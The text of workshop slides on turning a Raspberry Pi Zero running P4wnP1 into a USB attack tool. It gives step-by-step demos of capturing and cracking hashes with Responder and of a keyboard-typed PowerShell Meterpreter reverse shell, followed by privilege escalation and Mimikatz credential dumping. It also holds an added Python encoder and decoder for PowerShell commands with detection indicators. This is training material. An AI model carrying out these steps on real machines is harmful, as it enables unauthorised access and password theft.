Weaponizing the Raspberry Pi Zero
Black Hat Sessions XV
Welcome!
28/06/2017 2
Niels Vonk, Security Consultant
Vestdijk 59, 5611 CA Eindhoven
E-mail: [email protected], Phone: 06 – 5751 6677
Ben Brücker, Security Consultant
Vestdijk 59, 5611 CA Eindhoven
E-mail: [email protected], Phone: 06 – 2694 9189
Agenda
• Latest attack platforms
• The Raspberry Pi Zero
• Various attack methods
• Demo 1 – Responder
• Demo 2 – Meterpreter
Hardware attack platforms
Attack vectors
HID attacks
• Attack started to get popular around 2010
• Main development by Adrian Crenshaw (IronGeek), Darren Kitchen (Hak5) and Dave Kennedy (TrustedSec)
• Allows attackers to interface with systems as a keyboard
• Plug-and-play on all common operating systems: a USB keyboard needs no driver installation and no user approval
Network interface attacks
• The attached USB device acts as a network interface
• Installation without user interaction
• Hijacks routing priority via interface metrics
• Ability to launch network-based attacks
The almighty Raspberry Pi Zero W
• 1GHz, single-core CPU
• 512MB RAM
• Mini HDMI and USB On-The-Go ports
• Micro USB power
• 802.11 b/g/n wireless LAN
• Bluetooth 4.1
• Bluetooth Low Energy (BLE)
P4wnP1
• Developed by Marcus Mengs (MaMe82)
• https://github.com/mame82/P4wnP1
• Transforms a cheap Pi into a complete attack platform
• Support for:
• HID attacks
• Network attacks
• Data transfers
• Cross interaction between Pi and target
P4wnP1 – Network attack
• For Windows targets it will act as a RNDIS interface
• For Linux/Mac targets it will act as a CDC ECM interface
• Takes routing priority by giving its interface a lower metric than the existing interfaces
P4wnP1 - HID attack
• Plug-and-play installation posing as keyboard
• Ability to change the USB VID and PID to bypass device whitelists
• Can write exploits/backdoors to the target via the keyboard
• Allows in-memory execution via PowerShell
Demo non-tech guide
• Login to the Pi via Secure Shell Protocol (SSH)
• Edit the configuration file to select the correct payload
• Plug the Pi into the target via the USB port
• Wait and see the payload execute
• Retrieve the Pi
• Power on the Pi and login to the Pi via Secure Shell Protocol (SSH)
• Inspect your loot
• Crack the hash to retrieve the password
Responder attacks
Demo 1 - Responder
• P4wnP1 will install itself as a network device
• P4wnP1 will give an IP address to the target
• Routes will be set to redirect traffic to the P4wnP1
• Responder will start on the P4wnP1
• Client will try to connect to a non-existing share
• Responder will capture the authentication hash
• Win!
Demo 1 – Responder (prep)
• Use PuTTY to SSH into your Pi
• IP address of your Pi = 192.168.1.1<number on your Pi>
• Edit the setup file using the command:
• nano ~/P4wnP1/setup.cfg
• and make sure that the line with PAYLOAD=responder is not commented out (PAYLOAD=responder instead of #PAYLOAD=responder)
• Save the file via the following hotkey:
• CTRL+X Y ENTER
• Inspect the payload using the command:
• nano ~/P4wnP1/payloads/responder
• Attach the P4wnP1 via the USB port to the target
Demo 1 – Responder (action)
• Use PuTTY to SSH into your Pi
• IP address of your Pi = 192.168.1.1<number on your Pi>
• Run the following command to attach to the Responder screen session:
• sudo screen -x
• Inspect the behaviour and verify that the payload has executed
• Detach from the screen session using:
• CTRL+A D
Demo 1 – Responder (P4wn)
• Now we are going to crack the retrieved hash via the following command:
• /home/pi/P4wnP1/crack_last_responder.sh
• This command runs John the Ripper against a wordlist to retrieve the password
• Win!
Demo non-tech guide
• Login to the Pi via Secure Shell Protocol (SSH)
• Edit the configuration file to select the correct payload
• Create malicious code
• Insert created code in the payload
• Plug the Pi into the target via the USB port
• Wait and see the payload execute
• Retrieve the Pi
• Interact with the target via the remote connection that is created by the malicious code
Meterpreter attack
• Generate malicious code on attack machine
• Deliver this code via various methods on the target
• This code will run on the target machine and connect back to the attacker, thus bypassing ingress firewall filtering
• Via this tunnel we can interact with the target machine and execute commands on it
Demo 2 - Meterpreter
• P4wnP1 will install itself as a HID device
• Upon installation of the drivers the payload will be executed
• Script will start a shell with admin privileges
• The Meterpreter payload will be typed out as a base64-encoded string
• PowerShell will decode the base64 string and execute it in memory
• Creates a reverse_tcp connection to the MSF listener
• Win!
Demo 2 - Meterpreter (prep)
• Use PuTTY to SSH into your Pi
• IP address of your Pi = 192.168.1.1<number on your Pi>
• Edit the setup file via the command:
• nano ~/P4wnP1/setup.cfg
• and make sure that the line with PAYLOAD=meterpreter is not commented out (PAYLOAD=meterpreter instead of #PAYLOAD=meterpreter)
• Save the file via the following hotkey:
• CTRL+X Y
• Inspect the payload via the command:
• nano ~/P4wnP1/payloads/meterpreter
Demo 2 - Meterpreter (prep)
• Use PuTTY to SSH into the Metasploit server
• IP address of the Metasploit server = 192.168.1.100
• Run the following command to generate a payload:
• bash payload_generator.sh
• Copy the output starting at:
• %COMSPEC% /b /c start /b /min powershell.exe
• Now we are going to replace the old payload in the meterpreter file on the Pi:
• nano ~/P4wnP1/payloads/meterpreter
• Search for the line starting with:
• STRING %COMSPEC% /b /c start
Demo 2 - Meterpreter (prep)
• Cut this line via the following hotkey:
• CTRL+K
• Paste the payload by clicking the right mouse button (keep the STRING keyword in front of the pasted %COMSPEC% line, otherwise the HID script will not type it)
• Save the file via the following hotkey:
• CTRL+X Y
Demo 2 - Meterpreter (prep)
• Now back on the Metasploit server run the following command:
• msfconsole -r msf_receiver.rc
• This will start the Meterpreter handler to receive incoming connections
• Attach the P4wnP1 via the USB port to the target
Demo 2 - Meterpreter (action)
• The script will create an elevated Powershell session
• The payload will be typed out by the Pi
• Upon activation a new session should appear on the MSF server
• Access the session via the command:
• sessions -i <id>
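How the typed PowerShell one-liner is built, and how a defender reverses it from a process-creation log, as an added example (my own Python, not code from the talk, from P4wnP1 or from Metasploit): PowerShell's -EncodedCommand switch takes the script as base64 of its UTF-16LE bytes, and it accepts any unambiguous abbreviation of the switch name (-e, -ec, -enc, ...), which a decoder has to account for. The sample script and log line are constructed; 192.168.1.100 reuses the Metasploit server address from the prep slide, and port 4444 is an assumed listener port.

```python
# Added example: build and decode "powershell.exe -nop -w hidden -e <base64>".
# Not code from the talk, P4wnP1 or Metasploit; the sample script/log are constructed.
import base64

# Same shape as the line quoted on the slide (the part the HID script types).
HOST_PREFIX = "%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e "


def encode_psh_command(script: str) -> str:
    """-EncodedCommand wants base64 over the UTF-16LE bytes of the script."""
    return HOST_PREFIX + base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def is_encoded_switch(token: str) -> bool:
    """PowerShell accepts any prefix of -EncodedCommand that is not ambiguous
    with another switch (-e, -ec, -enc, -encoded, ...), case-insensitively;
    '-ex' is -ExecutionPolicy and must not match."""
    name = token.lstrip("-/").lower()
    return bool(name) and "encodedcommand".startswith(name)


def decode_psh_command(cmdline: str):
    """Returns the decoded script from a command line, or None if there is no
    usable encoded command (no switch, missing argument, or invalid base64)."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if is_encoded_switch(tok):
            blob = tokens[i + 1].strip("\"'")
            try:
                raw = base64.b64decode(blob, validate=True)
            except ValueError:  # binascii.Error is a ValueError subclass
                return None
            return raw.decode("utf-16-le", errors="replace")
    return None


# Strings a triage rule would look for inside the decoded script (assumed list).
SCRIPT_INDICATORS = ("IEX", "Invoke-Expression", "DownloadString",
                     "Net.Sockets.TCPClient", "FromBase64String", "Reflection.Assembly")


def triage(cmdline: str) -> dict:
    """Detection logic over one process command line: decode the script and
    collect the indicators that together characterise the typed-in stager."""
    decoded = decode_psh_command(cmdline)
    low = cmdline.lower()
    flags = []
    if "-w hidden" in low or "-windowstyle hidden" in low:
        flags.append("hidden window")
    if "-nop" in low or "-noprofile" in low:
        flags.append("no profile")
    if decoded is not None:
        flags.append("encoded command")
        flags += [f"script: {ind}" for ind in SCRIPT_INDICATORS if ind.lower() in decoded.lower()]
    return {"decoded": decoded, "flags": flags}


# Constructed sample: a stager-like script and the command line a sensor would log.
SAMPLE_SCRIPT = "$c = New-Object Net.Sockets.TCPClient('192.168.1.100', 4444)"
SAMPLE_LOG = encode_psh_command(SAMPLE_SCRIPT)

if __name__ == "__main__":
    print(SAMPLE_LOG)
    print(triage(SAMPLE_LOG))
```

The decoder deliberately splits on whitespace rather than using shell quoting rules: Windows command lines in Sysmon or 4688 events are not POSIX-quoted, and the base64 argument never contains spaces. Anything that decodes to replacement characters is worth a look too, since an attacker can hide the script in a non-UTF-16 payload that PowerShell still runs.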
Demo 2 - Meterpreter (P4wn)
• Now that we have an interactive shell, let's see what we can do
• Run the command getuid to retrieve the current user
• Get SYSTEM privileges with getsystem
• We can now dump the password hashes with hashdump
• But wait! Why not dump them in plain text? ☺
• Run load kiwi to load the newest version of Mimikatz
• Now execute the command creds_all
Questions?
Other usages
• Malware installation on airgapped systems
• Extraction of files from target computer
• Pivot into internal networks
• Man-in-the-Middle attacks
Future plans
• Let the P4wnP1 connect to your mobile devices over WiFi/Bluetooth for real-time access and interaction
• Create new payload samples
• More advanced staged exploits that create a permanent foothold in the network